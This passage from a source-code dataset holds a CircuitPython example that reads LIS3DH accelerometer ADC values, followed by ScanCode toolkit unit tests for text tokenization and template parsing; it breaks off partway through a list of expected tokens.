2021-05-02T14:17:14.000Z
|
Lights/adafruit-circuitpython-bundle-6.x-mpy-20210310/examples/lis3dh_adc.py
|
IanSMoyes/SpiderPi
|
cc3469980ae87b92d0dc43c05dbd579f0fa8c4b1
|
[
"Apache-2.0"
] | null | null | null |
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
# Analog to digital converter example.
# Will loop forever printing ADC channel 1 raw and mV values every second.
# NOTE the ADC can only read voltages in the range of ~900mV to 1800mV!
import time
import board
import busio
import adafruit_lis3dh
# Uncomment if using SPI
# import digitalio
# Hardware I2C setup. Use the CircuitPlayground built-in accelerometer if available;
# otherwise check I2C pins.
if hasattr(board, "ACCELEROMETER_SCL"):
i2c = busio.I2C(board.ACCELEROMETER_SCL, board.ACCELEROMETER_SDA)
lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c, address=0x19)
else:
i2c = busio.I2C(board.SCL, board.SDA)
lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c)
# Hardware SPI setup:
# spi = busio.SPI(board.SCK, board.MOSI, board.MISO)
# cs = digitalio.DigitalInOut(board.D5) # Set to correct CS pin!
# lis3dh = adafruit_lis3dh.LIS3DH_SPI(spi, cs)
# PyGamer I2C Setup:
# i2c = busio.I2C(board.SCL, board.SDA)
# lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c, address=0x19)
# Loop forever printing ADC readings.
while True:
# Read raw ADC value. Specify which ADC to read: 1, 2, or 3.
adc1_raw = lis3dh.read_adc_raw(1)
# Or read the ADC value in millivolts:
adc1_mV = lis3dh.read_adc_mV(1)
print("ADC 1 = {} ({} mV)".format(adc1_raw, adc1_mV))
time.sleep(1)
| 32.431818
| 85
| 0.715487
|
import time
import board
import busio
import adafruit_lis3dh
if hasattr(board, "ACCELEROMETER_SCL"):
i2c = busio.I2C(board.ACCELEROMETER_SCL, board.ACCELEROMETER_SDA)
lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c, address=0x19)
else:
i2c = busio.I2C(board.SCL, board.SDA)
lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c)
adc1_raw = lis3dh.read_adc_raw(1)
adc1_mV = lis3dh.read_adc_mV(1)
print("ADC 1 = {} ({} mV)".format(adc1_raw, adc1_mV))
time.sleep(1)
| true
| true
|
790afb8cdb3bfff53ceaff937c98d36c80e733ff
| 79,390
|
py
|
Python
|
tests/textcode/test_analysis.py
|
pombredanne/scancode-toolkit
|
0d90a0498148997de94f92b00adf7e33079a41a8
|
[
"Apache-2.0",
"CC0-1.0"
] | 3
|
2015-07-01T15:08:33.000Z
|
2015-11-05T03:15:36.000Z
|
tests/textcode/test_analysis.py
|
pombredanne/scancode-toolkit
|
0d90a0498148997de94f92b00adf7e33079a41a8
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
tests/textcode/test_analysis.py
|
pombredanne/scancode-toolkit
|
0d90a0498148997de94f92b00adf7e33079a41a8
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, print_function
import json
import os
import codecs
import cPickle
from unittest.case import skipIf
from commoncode.testcase import FileBasedTesting
from textcode.analysis import DEFAULT_GAP
from textcode.analysis import NO_GAP
from textcode.analysis import InvalidGapError
from textcode.analysis import UnbalancedTemplateError
from textcode.analysis import Token
from textcode.analysis import word_splitter
from textcode.analysis import unigram_splitter
from textcode.analysis import unigram_tokenizer
from textcode.analysis import position_processor
from textcode.analysis import template_splitter
from textcode.analysis import template_processor
from textcode.analysis import ngram_to_token
from textcode.analysis import ngram_tokenizer
from textcode.analysis import tokens_ngram_processor
from textcode.analysis import doc_subset
from textcode.analysis import unicode_text_lines
from textcode.analysis import text_lines
#############################################################################
#
# Code style note: lines are not wrapped to PEP8 line length on purpose
# to keep the tests more readable
#
#############################################################################
class TestDocsubset(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_doc_subset_single_line(self):
doc = '''A simple test
with multiple
lines
of text
'''.splitlines()
pos = Token(start=0, end=0, start_line=1, start_char=8, end_line=1, end_char=21)
expected = '''with multiple'''
tst = doc_subset(iter(doc), pos)
result = '\n'.join(tst)
assert expected == result
def test_doc_subset_multilines(self):
doc = '''0123456789\n0123456789\n'''.splitlines()
pos = Token(start=0, end=0, start_line=0, start_char=0, end_line=0, end_char=10)
expected = '0123456789'
tst = doc_subset(iter(doc), pos)
result = ''.join(tst)
assert expected == result
def test_doc_subset(self):
doc = iter('''A simple test
with multiple
lines
of text
'''.splitlines())
pos = Token(start=3, end=54, start_line=1, start_char=8, end_line=2, end_char=11)
expected = u'''with multiple
lin'''
tst = doc_subset(iter(doc), pos)
result = u'\n'.join(tst)
assert expected == result
class TestAnalysis(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_text_lines_from_list_or_location_yield_same_results(self):
test_file = self.get_test_loc('analysis/bsd-new')
with open(test_file, 'rb') as inf:
test_strings_list = inf.read().splitlines(True)
# test when we are passing a location or a list
from_loc = list(text_lines(location=test_file))
from_list = list(text_lines(location=test_strings_list))
assert from_loc == from_list
class TestUnigrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_unigrams_word_splitter_handles_empty_string(self):
text = iter([''])
result = list(unigram_splitter(text, splitter=word_splitter))
assert [] == result
def test_unigrams_word_splitter_handles_blank_lines(self):
text = iter([u' ', u'', u'\t '])
result = list(unigram_splitter(text, splitter=word_splitter))
assert [] == result
def test_unigrams_word_splitter_can_split(self):
text = iter(u'abc def \n GHI'.splitlines())
result = list(unigram_splitter(text, splitter=word_splitter))
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=3, value=u'abc'),
Token(start_line=0, end_line=0, start_char=4, end_char=7, value=u'def'),
Token(start_line=1, end_line=1, start_char=1, end_char=4, value=u'ghi'),
]
assert expected == result
def test_unigrams_word_splitter_handles_empty_iterable(self):
text = iter([])
result = list(unigram_splitter(text, splitter=word_splitter))
assert [] == result
def test_unigrams_template_splitter_handles_empty_string(self):
text = iter([''])
result = list(unigram_splitter(text, splitter=template_splitter))
assert [] == result
def test_unigrams_template_splitter_handles_blank_lines(self):
text = iter([' ', '', '\t '])
result = list(unigram_splitter(text, splitter=template_splitter))
assert [] == result
def test_unigrams_template_splitter_handles_empty_iterable(self):
text = iter([])
result = list(unigram_splitter(text, splitter=template_splitter))
assert [] == result
def test_unigrams_template_splitter_can_split(self):
text = iter(u'abc def \n GHI'.splitlines())
result = list(unigram_splitter(text, splitter=template_splitter))
assert [u'abc', u'def', u'ghi'] == [x.value for x in result]
def test_unigrams_template_splitter_can_split_templates(self):
text = u'abc def \n {{temp}} GHI'.splitlines()
result = list(unigram_splitter(text, splitter=template_splitter))
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=3, value=u'abc'),
Token(start_line=0, end_line=0, start_char=4, end_char=7, value=u'def'),
Token(start_line=1, end_line=1, start_char=1, end_char=3, value=u'{{'),
Token(start_line=1, end_line=1, start_char=3, end_char=7, value=u'temp'),
Token(start_line=1, end_line=1, start_char=7, end_char=9, value=u'}}'),
Token(start_line=1, end_line=1, start_char=10, end_char=13, value=u'ghi'),
]
assert expected == result
def test_position_processor(self):
tokens = [
Token(value=u'abc'),
Token(value=u'def'),
Token(value=u'temp'),
Token(value=u'ghi'),
]
expected = [
Token(value=u'abc', start=0, end=0),
Token(value=u'def', start=1, end=1),
Token(value=u'temp', start=2, end=2),
Token(value=u'ghi', start=3, end=3),
]
result = list(position_processor(tokens))
assert expected == result
def test_unigram_tokenizer(self):
inp = u'''Redistribution and use in source and binary forms, with or
without modification, are permitted provided that the following
conditions are met:
Redistributions of source code must retain the above
copyright notice, this list of conditions and the following
disclaimer.'''
tst = list(unigram_tokenizer(inp.splitlines(True)))
assert 39 == len(tst)
expected = u'''redistribution and use in source and binary forms with or
without modification are permitted provided that the following
conditions are met redistributions of source code must retain the above
copyright notice this list of conditions and the following
disclaimer'''.split()
result = [t.value for t in tst]
assert expected == result
class TestTemplates(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def template_parsing(self, lines):
if isinstance(lines, basestring):
lines = lines.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
return list(template_processor(unigrams))
def test_process_template_handles_empty_templates_using_default_gap(self):
lines = [u'ab{{}}cd']
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=6, end_char=8, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_gap(self):
lines = u'ab{{10 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=21, end_char=23, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_raise_invalid_gap_exception(self):
lines = u'ab{{151 nexb Company}}cd'
self.assertRaises(InvalidGapError, self.template_parsing, lines)
def test_process_template_recognizes_template_with_maxgap(self):
lines = u'ab{{150 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=150),
Token(start_line=0, end_line=0, start_char=22, end_char=24, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap(self):
lines = u'ab{{10}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=8, end_char=10, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap_and_spaces(self):
lines = u'ab{{ 10 }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=16, end_char=18, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified(self):
lines = u'ab{{nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified_ignoring_spaces(self):
lines = u'ab{{ \sdsdnexb Companysd }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=28, end_char=30, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap(self):
lines = u'ab{{nexb Company}}cd {{second}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=31, end_char=33, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap_and_custom_gaps(self):
lines = u'ab{{nexb Company}}cd{{12 second}}ef{{12 second}}gh'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=12),
Token(start_line=0, end_line=0, start_char=33, end_char=35, value=u'ef', gap=12),
Token(start_line=0, end_line=0, start_char=48, end_char=50, value=u'gh', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates(self):
lines = u'ab{{c}}d}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=7, end_char=8, value=u'd', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=10, end_char=12, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_empty_lines(self):
lines = u'\n\n'
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_handles_None(self):
lines = None
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_can_parse_simple_line(self):
lines = u'Licensed by {{12 nexB}} to you '
expected = u'licensed by to you'
result = u' '.join(x.value for x in self.template_parsing(lines))
assert expected == result
def test_process_template_does_not_throw_exception_for_illegal_pystache_templates(self):
lines = u'''Permission to use, copy, modify, and {{ /or : the
lines exist without or }} distribute this software...'''
self.template_parsing(lines)
def test_process_template_handles_unicode_text_correctly(self):
expected = [
Token(start_line=0, end_line=0, start_char=1, end_char=4, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=5, end_char=10, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=11, end_char=19, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=21, end_char=24, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=25, end_char=31, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=32, end_char=34, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=35, end_char=40, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=41, end_char=44, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=56, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=57, end_char=60, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=61, end_char=64, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.atxt')
with codecs.open(test_file, encoding='utf-8') as test:
lines = test.read().splitlines()
result = list(self.template_parsing(lines))
assert expected == result
def test_process_template_can_handle_long_text(self):
expected = [
Token(start_line=0, end_line=0, start_char=14, end_char=17, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=23, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=24, end_char=32, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=34, end_char=37, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=38, end_char=44, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=47, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=48, end_char=53, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=54, end_char=57, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=58, end_char=69, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=70, end_char=73, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=74, end_char=77, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
